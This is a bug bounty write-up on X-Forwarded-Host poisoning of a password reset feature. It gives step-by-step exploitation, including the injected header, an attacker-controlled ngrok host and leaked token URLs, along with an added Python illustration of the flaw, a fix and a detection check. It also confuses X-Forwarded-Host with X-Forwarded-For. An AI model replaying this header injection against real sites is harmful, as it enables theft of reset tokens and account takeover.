Bug hunting experience: adding an X-Forwarded-Host header to a password reset request to achieve full hijacking of victims' accounts

This writeup shares how, by adding an X-Forwarded-Host header to the password reset request sent through the website's "Forgot Password" feature, the target website was made to point its password reset link at a server under my control, which achieves complete hijacking of victims' accounts.

For confidentiality reasons, the target test site is referred to here as redacted.com. During testing I focused on its "Forgot Password" feature, and after six hours of grinding I found a very interesting vulnerability that, when exploited, allows full hijacking of victims' accounts on the target.

The discovery process

Tools required: BurpSuite and an Ngrok server. Ngrok maps a service running on the local PC to a server on the public cloud, so that the local PC can communicate with clients on the external network; the cloud server acts as a relay proxy between the external network and the PC on the internal network.

1. Visit the target site's Forgot Password function at https://redacted.com/users/forgot_password and enter a username to request a password reset link. Note: the target site then sends a password reset link to the registered email address.

2. During this process, capture the request with BurpSuite's intercept; the request packet is as follows:

To this request we add X-Forwarded-Host: bing.com and see whether the password reset link generated by the target site ends up containing bing.com.

X-Forwarded-For (XFF) is an HTTP request header field used to identify the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer. The developers of the Squid caching proxy server first introduced this header field, and it was later formally proposed for standardization in an IETF draft [1]. See the reference for details.

3. Now we open the mailbox and look at the long-awaited password reset link sent by the target site. We can see that the message contains the password reset link with the user's token, which looks roughly as follows:

https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

This shows that my password reset token has been forwarded to bing.com. Since this has to be a real, valid token, we can replace the https://bing.com in the password reset link with the target site https://redacted.com;

4. Sure enough, opening that page lets us actually reset the password!
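The behaviour exploited above, as an added illustration that is not from the original post: a reset-link builder that takes its host from X-Forwarded-Host (the vulnerable pattern), the hardened version that only uses the configured canonical host, and a check that flags reset requests whose host headers disagree with it. The `redacted.com` host, the token value and the header names are assumed sample inputs.

```python
from urllib.parse import urlunsplit

# Constructed sample values: the writeup's redacted target host and a stand-in token path.
CANONICAL_HOST = "redacted.com"
RESET_PATH = "/users/reset_password/"


def _header(headers: dict, name: str):
    """Case-insensitive header lookup. X-Forwarded-Host may carry a comma-separated
    list from chained proxies; the first (outermost) value is taken in that case."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value.split(",")[0].strip()
    return None


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """The pattern the writeup exploited: the link host comes from request headers,
    and X-Forwarded-Host is set by whoever sends the request."""
    host = _header(headers, "X-Forwarded-Host") or _header(headers, "Host") or CANONICAL_HOST
    return urlunsplit(("https", host, RESET_PATH + token, "", ""))


def reset_link_hardened(headers: dict, token: str) -> str:
    """Fix: never derive the host from the request. The headers argument is kept
    only for signature parity and is deliberately ignored."""
    return urlunsplit(("https", CANONICAL_HOST, RESET_PATH + token, "", ""))


def host_header_mismatch(headers: dict) -> bool:
    """Detection: True when Host or X-Forwarded-Host on a reset request does not
    match the configured host (port stripped). Worth logging even after the fix."""
    for name in ("Host", "X-Forwarded-Host"):
        value = _header(headers, name)
        if value is not None and value.split(":")[0].lower() != CANONICAL_HOST:
            return True
    return False


if __name__ == "__main__":
    # Constructed request headers mirroring the writeup's test.
    poisoned = {"Host": "redacted.com", "X-Forwarded-Host": "bing.com"}
    token = "SAMPLE_TOKEN"
    print(reset_link_vulnerable(poisoned, token))  # link points at bing.com
    print(reset_link_hardened(poisoned, token))    # link points at redacted.com
    print(host_header_mismatch(poisoned))          # True
```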

Exploit

Based on the behaviour and problem described above, I can build a setup to hijack users' information. The steps are as follows:

1. Set up the Attacker server with ngrok;

2. Open BurpSuite's intercept, enter the victim's username in the target site's "Forgot Password" form, and submit the password reset request;

3. In the password reset request packet captured by BurpSuite, add the Attacker server in the following format:

X-Forwarded-Host: ngrok.io

where ngrok.io is the domain name of the Attacker server. For example:

4. So when the victim receives the password reset link sent by the target website, the link in their mailbox will contain the Attacker server's domain name, for example:

http://ngrok.io/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

When the victim carelessly clicks the link, their password reset token is sent in the request to the Attacker server ngrok.io (this step requires user interaction);

5. While the victim opens the link above, on the Attacker server ngrok.io the attacker sees the victim's request information, which contains the user's password reset token, as follows:

6. At this point, having obtained the victim user's password reset token, the attacker replaces the Attacker server ngrok.io with the target website https://redacted.com, appends the victim user's password reset token, and can successfully reset the victim's account password, achieving complete hijacking of the account.

After I reported this vulnerability, I was rewarded with a three-digit US dollar bounty (between $700 and $1000). Thanks for reading.


Source: blog.csdn.net/u012206617/article/details/103913930